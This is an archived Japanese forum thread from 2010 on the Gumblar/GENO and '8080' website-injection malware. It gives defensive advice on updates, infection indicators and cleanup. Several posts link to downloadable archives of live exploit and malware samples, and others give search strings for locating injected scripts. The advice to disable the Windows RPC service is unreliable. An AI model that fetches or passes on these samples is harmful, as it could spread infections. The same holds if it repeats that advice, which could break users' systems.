【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
レス数が1000を超えています。これ以上書き込みはできません。
ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ2【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263055073/
【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
・Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
ttp://www.forest.impress.co.jp/docs/review/20091020_323014.html
ttp://hide9999.web.fc2.com/
■ Gumblar被害拡大中(1)(2)(3)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2092
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2093
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
レジストリの修復 Windowsを使わずに修復してみる
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701
【旧Gumblar(GENO)ウイルスのまとめなど】
*** 【注意!】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ***
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
■ GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
メディアなどでは「ガンブラー(の亜種)」と紹介されていますが
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*LGPL*/
<script>/*GNU GPL*/
<script>/*CODE1*/
などから始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を
利用していますがこちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
■ 感染確認(2000,XP)
あくまで現時点での確認方法であることに注意してください
セーフモードから起動してレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録があれば感染済
上記の登録情報を削除した上で
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
のファイルを削除すれば復旧しますが、亜種等で違うこともあるので
可能な限りクリーンインストール&サイト持ちは
安全なPCからのパスワードの変更を推奨します
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページなどに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)
削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除
随時訂正(修正)お願いします
0010名無しさん@お腹いっぱい。
2010/01/18(月) 23:00:300011名無しさん@お腹いっぱい。
2010/01/18(月) 23:06:26>>8
○ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
× C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
0012名無しさん@お腹いっぱい。
2010/01/18(月) 23:12:06■ JPCERT コーディネーションセンター (JPCERT/CC)
ttps://www.jpcert.or.jp/
・Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt
・インシデントの届出
ttps://form.jpcert.or.jp/
・記入例
ttp://www.jpcert.or.jp/pr/2010/form.png
■ Google Safe Browsing: Report a Malware Page
ttp://www.google.com/safebrowsing/report_badware/
0013名無しさん@お腹いっぱい。
2010/01/18(月) 23:12:07■専ブラで右クリからの検索を有効にする方法。
設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
Gumblar Checker2=http://genochk.crz.jp/index.php?url=$LINK&hids=on&code=on&chk=AUTO
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
0015名無しさん@お腹いっぱい。
2010/01/19(火) 00:24:51Exploit・本体まとめ 〜2010/01/18
ttp://labs-uploader.sabaitiba.com/virus/download/1263827976.7z
PASS:virus
0016名無しさん@お腹いっぱい。
2010/01/19(火) 02:01:35Exploit・本体まとめ 〜2010/01/19
ttp://labs-uploader.sabaitiba.com/virus/download/1263833996.7z
PASS:virus
一件追加されました
0017名無しさん@お腹いっぱい。
2010/01/19(火) 07:13:30さっきaguseで検出できないとおもったらそんなことは無かったけど
ちょっとかわってるので
http://www.virustotal.com/jp/analisis/5714e32c201ceb5eb8773e51840d53fc1b1bd5f8e12016b87607d00cb1e13d6d-1263852301
でもカスペルスキーはスルーしてたのか
0018名無しさん@お腹いっぱい。
2010/01/19(火) 11:34:58tp://www.bing.com/search?q=%22document.write%28unescape%28%22+%22hp_d00%28unescape%28%22&go=&form=QBLH&filt=all
検索ワード:"document.write(unescape(" "hp_d00(unescape("
↓アクセス注意↓
tp://pastebin●com/m52cca06b
tp://9jan010-1320●free4r●com/jb●htmlなどなど。
0019名無しさん@お腹いっぱい。
2010/01/19(火) 11:46:20専ブラによってはht抜いた程度じゃリンクしちゃうからTOPに自動で飛ばすページだとURLによっては踏む可能性がある
0020名無しさん@お腹いっぱい。
2010/01/19(火) 11:53:28素人じゃないんだから踏まなきゃいいんだよ
0021名無しさん@お腹いっぱい。
2010/01/19(火) 11:54:430022名無しさん@お腹いっぱい。
2010/01/19(火) 11:57:19あんたが正しい
0023名無しさん@お腹いっぱい。
2010/01/19(火) 12:00:47ノートン先生に祭り上げられてるから見てみたら
Trojan-Downloader.JS.Agent.ewo反応
のソースチェッカーで見たら明らかに一番下に変なソースが入っているからGENOっぺぇお
0024名無しさん@お腹いっぱい。
2010/01/19(火) 12:16:39headerを取得=http://fula.jp/cgi-bin/head/?url=$TEXT$LINK
headerとソースとスクリーンショットを取得=http://fula.jp/cgi-bin/head2/?url=$TEXT$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
Mcafee SiteAdvisorでリンク先をチェック=http://siteadvisor.pl/lookup/?q=$TEXT$LINK
Google セーフ ブラウジング診断ページ=http://www.google.com/safebrowsing/diagnostic?site=$LINK
0025名無しさん@お腹いっぱい。
2010/01/19(火) 12:34:20ttp://www.askulnet●com/
0026名無しさん@お腹いっぱい。
2010/01/19(火) 12:39:010027名無しさん@お腹いっぱい。
2010/01/19(火) 12:51:36アスクル本体とはちゃうけどね
0028名無しさん@お腹いっぱい。
2010/01/19(火) 12:54:09アスクル、アスクルアリーナの代理店だそうだ
0029名無しさん@お腹いっぱい。
2010/01/19(火) 13:05:270030名無しさん@お腹いっぱい。
2010/01/19(火) 13:06:26クリックする気が無いところでクリックしてしまったり、マウスポインタが意図せず動いたりしたことはない?
タッチパッド使ってるし、踏めないようになってると安心なんだけど
0031名無しさん@お腹いっぱい。
2010/01/19(火) 13:34:43図面や絵を扱ってるとタッチパッドじゃ仕事にならないから使わないが
0032名無しさん@お腹いっぱい。
2010/01/19(火) 13:43:320033名無しさん@お腹いっぱい。
2010/01/19(火) 13:44:450034名無しさん@お腹いっぱい。
2010/01/19(火) 13:49:020035名無しさん@お腹いっぱい。
2010/01/19(火) 14:08:51たまに直リンしちゃって騒いでる人がおるがなw
0036名無しさん@お腹いっぱい。
2010/01/19(火) 14:14:21その設定Janeでできる?
0037名無しさん@お腹いっぱい。
2010/01/19(火) 14:27:24乙です
0038名無しさん@お腹いっぱい。
2010/01/19(火) 14:31:06ごめん俺少数派のゾヌ2なのよね
普通はワンクッション切ってる人のが多そうだしな
何で開くか選択する画面が出るんだわ
ゾヌか規定のブラウザか簡易ビューアか?みたいな
0039名無しさん@お腹いっぱい。
2010/01/19(火) 14:36:57ttp://www.nittyokyo.or●jp/
http://www.virustotal.com/jp/analisis/d460e750a6091ca9bce804f51970b95107169311482b8907fae469830209f803-1263879146
9/41
0040名無しさん@お腹いっぱい。
2010/01/19(火) 14:41:33その機能いいなあ
0041名無しさん@お腹いっぱい。
2010/01/19(火) 14:41:590042名無しさん@お腹いっぱい。
2010/01/19(火) 14:43:22おもいきってブラウザ指定のパスに存在しないファイル名を書いておくとかすると
開かないようになる・・・かな??
0043名無しさん@お腹いっぱい。
2010/01/19(火) 14:43:23JaneViewなら
設定→機能→「画像で全拡張子をビューアで処理」にチェック
0044名無しさん@お腹いっぱい。
2010/01/19(火) 14:43:31探偵屋の元締め?
裏情報いっぱいありそうで流出やばくね?
0045名無しさん@お腹いっぱい。
2010/01/19(火) 14:44:000046名無しさん@お腹いっぱい。
2010/01/19(火) 14:44:450047名無しさん@お腹いっぱい。
2010/01/19(火) 14:48:06それをテキストファイルに指定してる
踏むなとか書いた
0048名無しさん@お腹いっぱい。
2010/01/19(火) 14:49:52FC2が注意喚起をした
>■ 危険防止について
>二次感染、三次感染を防ぐためにも、下記の点にご注意ください。
> * Windows Update を行う
> * Adobe Acrobat 及び Adobe Reader を最新にする
> * Adobe Flash Player を最新にする
> * Java Applet や ActiveX の設定を OFF にする
> * 見覚えのない怪しいリンクは開かない
> * ウィルス対策ソフトをインストールする
> * ウイルス定義ファイルを更新する
んん〜
0049名無しさん@お腹いっぱい。
2010/01/19(火) 14:51:48ちょっとやってみる
いいかも
0050名無しさん@お腹いっぱい。
2010/01/19(火) 14:55:44現在冬眠中だが、ひっそり動いてるかもしれない
■8080系(巷ではGumblar亜種と呼ばれている)
/*GNU GPL*/:進化して/*LGPL*/になった。
/*CODE1*/:現在進化中につき要注意。
世界各地で毎日絶賛バージョンアップ中w
※/*CODE1*/(新型?)の検索は
検索ワード:"document.write(unescape(" "hp_d00(unescape("
注:GoogleよりBingのほうが絞り込める
■何故かスルーされる亜種っぽいやつ
<script>function〜:8080系の亜種?
検索ワード:"<script>function" "return String.fromCharCode(c);" "getElementById("
※ちまちま増えてるから注意が必要
0051名無しさん@お腹いっぱい。
2010/01/19(火) 14:59:010052名無しさん@お腹いっぱい。
2010/01/19(火) 15:25:150053名無しさん@お腹いっぱい。
2010/01/19(火) 15:30:01がんばれ〜 JSファイルにまだあるよー
0054名無しさん@お腹いっぱい。
2010/01/19(火) 15:51:22NHKのソースで
0055名無しさん@お腹いっぱい。
2010/01/19(火) 15:57:20カスペだと、↓こんなん出ました
社団法人日本調査業協会
2010/01/19 15:51:40 検出しました: HEUR:Trojan-Downloader.Script.Generic http://www●nittyokyo●or●jp/
0056名無しさん@お腹いっぱい。
2010/01/19(火) 16:03:51テキストブラウザ良いな。
俺はもっとマイナーなHTML2にしている。
0057名無しさん@お腹いっぱい。
2010/01/19(火) 16:37:26マカはトロイと反応しました。
0058名無しさん@お腹いっぱい。
2010/01/19(火) 16:38:570059名無しさん@お腹いっぱい。
2010/01/19(火) 16:58:42重複してんぞ
どうなってんだ
0060名無しさん@お腹いっぱい。
2010/01/19(火) 17:29:08URLで吹いたwww
0061名無しさん@お腹いっぱい。
2010/01/19(火) 17:32:04おでん授頂ければと思います。
0062名無しさん@お腹いっぱい。
2010/01/19(火) 17:34:35だいこん、白滝、餅入り巾着
0063名無しさん@お腹いっぱい。
2010/01/19(火) 17:38:070064名無しさん@お腹いっぱい。
2010/01/19(火) 17:52:220065名無しさん@お腹いっぱい。
2010/01/19(火) 17:52:24玉子と大根とからしがあればご飯何杯でもいける!
0066名無しさん@お腹いっぱい。
2010/01/19(火) 17:54:560067名無しさん@お腹いっぱい。
2010/01/19(火) 17:56:530068名無しさん@お腹いっぱい。
2010/01/19(火) 17:59:140069名無しさん@お腹いっぱい。
2010/01/19(火) 18:15:530070名無しさん@お腹いっぱい。
2010/01/19(火) 18:17:460071名無しさん@お腹いっぱい。
2010/01/19(火) 18:18:190072名無しさん@お腹いっぱい。
2010/01/19(火) 18:21:43酸っぱくね?>サボテン
0073名無しさん@お腹いっぱい。
2010/01/19(火) 18:23:50一日に300アクセスあるそうです
日本の探偵業の方々感染してるかも
0074名無しさん@お腹いっぱい。
2010/01/19(火) 18:25:56300って少ないだろ・・・
0075名無しさん@お腹いっぱい。
2010/01/19(火) 18:27:140076名無しさん@お腹いっぱい。
2010/01/19(火) 18:50:30ギャンブラー(ばくちうち)は、gamblerで
ガンブラーはgumblarだったんだな。
0077名無しさん@お腹いっぱい。
2010/01/19(火) 18:50:54被害者も少なくていいわけだが
0078名無しさん@お腹いっぱい。
2010/01/19(火) 18:51:04物によるな
アロエは苦いけど美味いよ
0079名無しさん@お腹いっぱい。
2010/01/19(火) 18:51:080080名無しさん@お腹いっぱい。
2010/01/19(火) 18:54:50アロエは蜂蜜に漬ければなんとか食えるな
身体によさげ
0081名無しさん@お腹いっぱい。
2010/01/19(火) 18:58:00IE8で互換性表示offで見るとIEが動作停止するのは俺だけ?
0082名無しさん@お腹いっぱい。
2010/01/19(火) 19:00:25自分もだ。
何度も何度も何度も何度も何度も何度m
途切れて見られない。
でも、入力したサイトによるんだよね。何でかな。
0083名無しさん@お腹いっぱい。
2010/01/19(火) 19:01:420084名無しさん@お腹いっぱい。
2010/01/19(火) 19:04:55なぁ
0085名無しさん@お腹いっぱい。
2010/01/19(火) 19:08:070086名無しさん@お腹いっぱい。
2010/01/19(火) 19:11:060087名無しさん@お腹いっぱい。
2010/01/19(火) 19:16:510088名無しさん@お腹いっぱい。
2010/01/19(火) 19:24:10謝罪はしても反省はしないような人間なんだろうな。
そんなにまでして広告収入が欲しいのかね?
0089名無しさん@お腹いっぱい。
2010/01/19(火) 19:27:45設定で変えれるだろ
申し訳ございません。
ハイライト表示に使っているSyntaxHighlighterの一部機能がIE8と相性が悪いようで、この機能を無効にすることで修正しました
0091名無しさん@お腹いっぱい。
2010/01/19(火) 19:47:25うわ、作者様!さすが対応素早い、ありがとう!
こちらこそものすごくお世話になってます。
0092名無しさん@お腹いっぱい。
2010/01/19(火) 20:13:360093名無しさん@お腹いっぱい。
2010/01/19(火) 20:21:10違うかな?
0094名無しさん@お腹いっぱい。
2010/01/19(火) 20:21:35修正してあるけどお知らせ無しですか
0095名無しさん@お腹いっぱい。
2010/01/19(火) 20:22:27出ないよ。
0096名無しさん@お腹いっぱい。
2010/01/19(火) 20:25:59その立場にしてコンプライアンス無視
いいねえ〜w
0097名無しさん@お腹いっぱい。
2010/01/19(火) 20:31:42人の事は調査するけども自分のことを調査されるのは嫌いですってか
0098名無しさん@お腹いっぱい。
2010/01/19(火) 20:32:54ごめん見方間違えた、「改ざんされた可能性があります」ってのはサイトの本文か。
ほんとに検出されたら「表示しない」って出るんだね。
ロッテさんみなさん、失礼。
0099名無しさん@お腹いっぱい。
2010/01/19(火) 20:47:400100名無しさん@お腹いっぱい。
2010/01/19(火) 20:50:430101名無しさん@お腹いっぱい。
2010/01/19(火) 20:51:22情報セキュリティのラック|LAC
http://www.lac.co.jp/
ttp://spysee.jp/%E6%96%B0%E4%BA%95%E6%82%A0
ttp://www.lac.co.jp/special/arai200807-01.html
専門家と称する方にお願い。事後に語るより
事前にウイルスの万延を防いで欲しいものです。。
0102名無しさん@お腹いっぱい。
2010/01/19(火) 21:09:510103名無しさん@お腹いっぱい。
2010/01/19(火) 21:09:510104名無しさん@お腹いっぱい。
2010/01/19(火) 21:54:20IE以外にしてjavascriptをきればいい
0105名無しさん@お腹いっぱい。
2010/01/19(火) 21:56:530106名無しさん@お腹いっぱい。
2010/01/19(火) 22:06:06撒布サイトに対してリダイレクトさせるんだろう?
改竄できるくらいなら、そのサイトに直接ウィルスを置けるのに。
あえてワンクッション入れるのには何か意味あるの?
0107名無しさん@お腹いっぱい。
2010/01/19(火) 22:08:21なんでIEは駄目なの?
0108名無しさん@お腹いっぱい。
2010/01/19(火) 22:09:210109名無しさん@お腹いっぱい。
2010/01/19(火) 22:10:09h++p://anian.just-size●net/
Wepawetによると8080にやられてるっぽい。
AntiVir PersonalではJS/Agent.Bay.1で検出。
0110名無しさん@お腹いっぱい。
2010/01/19(火) 22:13:40中国でIEが標的になってpwが盗まれたらしいよ。
0111名無しさん@お腹いっぱい。
2010/01/19(火) 22:20:540112名無しさん@お腹いっぱい。
2010/01/19(火) 22:23:44menu.js
/*LGPL*/
0113名無しさん@お腹いっぱい。
2010/01/19(火) 22:45:48copy.jsも
0114名無しさん@お腹いっぱい。
2010/01/19(火) 22:54:140115名無しさん@お腹いっぱい。
2010/01/19(火) 22:58:50通販のメアドにめるしたお。
0116名無しさん@お腹いっぱい。
2010/01/19(火) 23:04:36ありがとう。こっちはJPCERT/CCにインシデント報告しておきました。
JPCERTが具体的に何をするのかはわかりませんが。
0117名無しさん@お腹いっぱい。
2010/01/19(火) 23:46:39index.html
index.htm
index.php
*.js
↑の他もある?
0118名無しさん@お腹いっぱい。
2010/01/19(火) 23:50:261 2階に上がる
2 パソコンを持つ
3 思いっきり投げ捨てる これでおk
0119名無しさん@お腹いっぱい。
2010/01/19(火) 23:52:140120名無しさん@お腹いっぱい。
2010/01/19(火) 23:54:02誰も鯖缶しなくなるぞ。
0121名無しさん@お腹いっぱい。
2010/01/19(火) 23:59:00ttp://labs-uploader.sabaitiba.com/virus/download/1263912888.zip
鼬ごっこってレベルじゃねーぞ(AA略
0122名無しさん@お腹いっぱい。
2010/01/20(水) 00:04:06なにやってんだ馬鹿ヤロー
0123名無しさん@お腹いっぱい。
2010/01/20(水) 00:09:18レスd
0124名無しさん@お腹いっぱい。
2010/01/20(水) 00:12:04virustotalにおくっといた
0125名無しさん@お腹いっぱい。
2010/01/20(水) 00:14:44いつも乙です
ところで、どうやってそれだけの検体を?本体マルウェアとか
0126名無しさん@お腹いっぱい。
2010/01/20(水) 00:23:46「地雷を‘実際に踏んで’回収」
0127名無しさん@お腹いっぱい。
2010/01/20(水) 00:23:54IE6、IE7、IE8それぞれに脆弱性が存在する。
IE6は即アウトだがIE7、IE8はデータ実行防止DEPを有効にすれば一応凌げる。
IE7は詳細設定から「オンラインからの攻撃の緩和に役立てるため、メモリ保護を有効にする」 をクリック。
IE8はディフォでデータ実行防止DEPが有効。
0128名無しさん@お腹いっぱい。
2010/01/20(水) 00:31:14―――――――――――――‐┬┘
| >>118
____.____ | .__ いらないPCを
| | | | |\_\ 窓から投げ捨てろ
| | ∧_∧ | | | |.◎.|
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄ ̄
0129名無しさん@お腹いっぱい。
2010/01/20(水) 00:36:57,,-' _,,-''" "''- ,,_  ̄"''-,,__ ''--,,__
,,-''" ,, --''"ニ_―- _ ''-,,_ ゞ "-
て / ,,-",-''i|  ̄|i''-、 ヾ {
(" ./ i {;;;;;;;i| .|i;;;;;;) ,ノ ii
,, ( l, `'-i| |i;;-' ,,-'" _,,-"
"'-,, `-,,,,-'--''::: ̄:::::::''ニ;;-==,_____ '" _,,--''"
 ̄"''-- _-'':::::" ̄::::::::::::::::;;;;----;;;;;;;;::::`::"''::---,,_ __,,-''"
._,,-'ニ-''ニ--''" ̄.i| ̄ |i-----,, ̄`"''-;;::''-`-,,
,,-''::::二-''" .--i| .|i "- ;;:::`、
._,-"::::/  ̄"''--- i| |i ヽ::::i
.(:::::{:(i(____ i| .|i _,,-':/:::}
`''-,_ヽ:::::''- ,,__,,,, _______i| .|i--__,,----..--'''":::::ノ,,-'
"--;;;;;;;;;;;;;;;;;""''--;;i| .|i二;;;;;::---;;;;;;;::--''"~
 ̄ ̄"..i| .|i
.i| |i
i| |i
.i| .|i
.i| |i
.i| ,,-、 、 |i
i| ノ::::i:::トiヽ、_.|i
_,, i|/"ヽ/:iヽ!::::::::ノ:::::Λ::::ヽ|i__n、ト、
,,/^ヽ,-''":::i/::::::::/:::::|i/;;;;;;/::::;;;;ノ⌒ヽノ::::::::::::ヽ,_Λ
;;;;;;:::::;;;;;;;;;;:::::;;;;;;;;:::/;;;;;;:::::::::;;;;;;/;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::::::::::;;:;;;;:::ヽ
0130名無しさん@お腹いっぱい。
2010/01/20(水) 00:38:020131名無しさん@お腹いっぱい。
2010/01/20(水) 01:23:53何となく鑑定スレ見てたらこんなのが依頼されてた
これからは短縮URLサービス使ったトラップも増えていくだろうし2chもおっかないのう
0132名無しさん@お腹いっぱい。
2010/01/20(水) 01:28:52なんか違うような気がする
0133名無しさん@お腹いっぱい。
2010/01/20(水) 01:40:06|\_\
| |.◎.|
| |.: |
.\|.≡.|
 ̄ ̄
_,,_ ∩
(^Д^)/
⊂ ノ とったどー
(つ ノ
(ノ
0134名無しさん@お腹いっぱい。
2010/01/20(水) 02:51:45i |i li| il|
. | 百 |; ガッ
;.:|___d._|;'
☆(;。∀゚)←>>***
/⊃ ⊃
0135名無しさん@お腹いっぱい。
2010/01/20(水) 03:59:30普通にweb巡回するだけでノートンの糞アドオンが真っ赤になる始末
今までだと掲示板系サイトの誤爆で済んでたがソース元を見るとjs絡みのtrojanと明らかにアレ臭い
動画サイトは思いっきりJS開いてるんだがflashの方のadobe側の対応は間に合っているのかな・・・
0136名無しさん@お腹いっぱい。
2010/01/20(水) 04:26:08・・・と思ったのが去年の四月でした
0137名無しさん@お腹いっぱい。
2010/01/20(水) 04:41:370138名無しさん@お腹いっぱい。
2010/01/20(水) 04:51:28却ってエロサイトの方が管理をしっかりやってるのが多い気がする。
0139名無しさん@お腹いっぱい。
2010/01/20(水) 04:52:420140名無しさん@お腹いっぱい。
2010/01/20(水) 04:54:03他板に専用対策スレがあるのも納得
0141名無しさん@お腹いっぱい。
2010/01/20(水) 06:03:07E.exe.virusはavast!にメールした
ttp://www.virustotal.com/analisis/935b0ac1d07d88920ab593f097526357b0aa6fed79e37e0b89874d950706bd2e-1263933549
0142名無しさん@お腹いっぱい。
2010/01/20(水) 08:20:23MicrosoftがIEの臨時パッチを公開へ、脆弱性問題に対応
ttp://www.itmedia.co.jp/news/articles/1001/20/news021.html
> DEFがデフォルトで有効になっているIE 8へのアップグレードを勧告している。
> しかし仏セキュリティ企業のVUPENが、DEPをかわす方法が見つかったと発表するなど状況は変わりつつある。
0143名無しさん@お腹いっぱい。
2010/01/20(水) 08:22:040144名無しさん@お腹いっぱい。
2010/01/20(水) 08:52:23対策はウィルスソフト更新しろとしか言わないのな
JAVA、PDF云々は言わないってのはやっぱなんか裏にあるのかな?
0145名無しさん@お腹いっぱい。
2010/01/20(水) 08:54:280146名無しさん@お腹いっぱい。
2010/01/20(水) 08:56:36|
{ ! _,, -ェェュ、 |
ィ彡三ミヽ `ヽ ,ィハミミミミミミミミミヽ、|
彡'⌒ヾミヽ `ー /ililハilミilミliliミliliミliliミ|
ヾ、 /iiiiイ!ヾヾミ、ミニ=ー-ミ|
_ `ー―' i!ハ:.:.\\_::::::::::::::/:.| NHKは
彡三ミミヽ i! ヽ:.:.:.:冫': : :::/,,∠|
彡' ヾ、 _ノ i!::: ̄二ー:: : ::::ソ ・ ,| 太陽と煉瓦に
`ー ' {ヘラ' ・_>シ;テツ"''''"|
,ィ彡三ニミヽ __ノ ヽヘ`" 彡' 〈 | 監視されて
彡' ` ̄ `\ ー-=ェっ |
_ __ ノ {ミ;ヽ、 ⌒ | います
,ィ彡'  ̄ ヾミミミミト-- ' |
ミ三彡' /⌒ / ̄ ̄ | : ::::::::::|
ィニニ=- ' / i `ー-(二つ
,ィ彡' { ミi (二⊃
// / l ミii ト、二)
彡' __,ノ | ミソ :..`ト-'
/ | ミ{ :.:.:..:|
ノ / ヾ\i、 :.:.:.:.:|
ィニ=-- '" / ヾヾiiヽ、 :.:.:.:.::::|
/ / `/ ̄ ̄7ハヾヾ : .:.:.|
ノ _/ / / |:. :.:.:.:.:.:.:|
0147名無しさん@お腹いっぱい。
2010/01/20(水) 08:56:40素人に細かい設定なんか無理だろって思ってんじゃね?
NHKならPCの苦手な年寄りも多く見てるだろうし
0148名無しさん@お腹いっぱい。
2010/01/20(水) 08:58:49しなくなってしまった
0149名無しさん@お腹いっぱい。
2010/01/20(水) 09:02:50ここどーですか?
